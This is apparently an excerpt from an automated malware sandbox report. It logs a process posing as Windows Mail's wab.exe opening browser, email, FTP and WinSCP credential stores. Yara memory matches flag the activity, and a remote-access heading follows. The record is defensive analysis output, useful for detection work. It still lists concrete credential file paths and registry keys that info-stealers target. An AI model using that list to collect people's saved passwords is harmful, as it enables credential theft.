Source: Yara match File source: 00000008.00000002.3260035578.0000000020871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 6476, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\FTP Navigator\Ftplist.txt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: Yara match File source: 00000008.00000002.3260035578.0000000020821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 6476, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000008.00000002.3260035578.000000002084E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3260035578.0000000020821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3260035578.0000000020871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 6476, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs